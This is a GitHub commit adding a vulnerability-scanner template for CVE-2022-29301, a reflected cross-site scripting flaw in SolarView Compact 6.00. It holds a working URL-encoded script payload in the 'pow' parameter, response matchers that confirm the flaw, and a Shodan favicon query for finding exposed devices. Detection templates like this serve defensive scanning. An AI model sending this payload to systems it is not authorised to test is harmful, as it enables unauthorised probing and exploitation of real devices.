Create CVE-2022-29301.yaml

patch-1
林寒 2022-06-16 01:14:08 +08:00 committed by GitHub
parent debc17529f
commit b52e5a1887
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2022-29301
info:
name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
author: For3stCo1d
severity: medium
reference:
- https://www.exploit-db.com/exploits/50968
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301
metadata:
shodan-query: http.favicon.hash:-244067125
tags: cve,cve2022,xss,solarview
requests:
- method: GET
path:
- '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200